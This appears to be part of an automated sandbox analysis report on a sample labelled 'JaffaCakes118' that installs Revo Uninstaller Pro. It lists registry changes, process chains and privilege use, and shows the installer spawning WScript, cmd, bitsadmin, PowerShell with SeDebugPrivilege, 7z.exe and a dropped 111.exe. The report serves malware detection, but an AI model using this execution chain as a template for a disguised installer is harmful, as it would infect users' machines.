Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\FLAGS\ = "0" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll" | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder\Attributes = "48" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} | C:\Windows\system32\regsvr32.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\ = "LicProtector Object" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F} | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\.ruel | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF} | C:\Windows\system32\regsvr32.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32\ = "C:\\PROGRA~1\\VSREVO~1\\REVOUN~1\\ruplp.exe" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell\open | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0} | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4092 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 4092 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 4092 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 4540 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 4540 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 4540 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 4540 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 4540 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 4540 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 4852 wrote to memory of 4616 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 4616 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 4616 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 3340 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 3948 wrote to memory of 3340 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 3948 wrote to memory of 3340 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 4616 wrote to memory of 3704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4616 wrote to memory of 3704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4616 wrote to memory of 3704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4616 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 4616 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 4616 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 4616 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
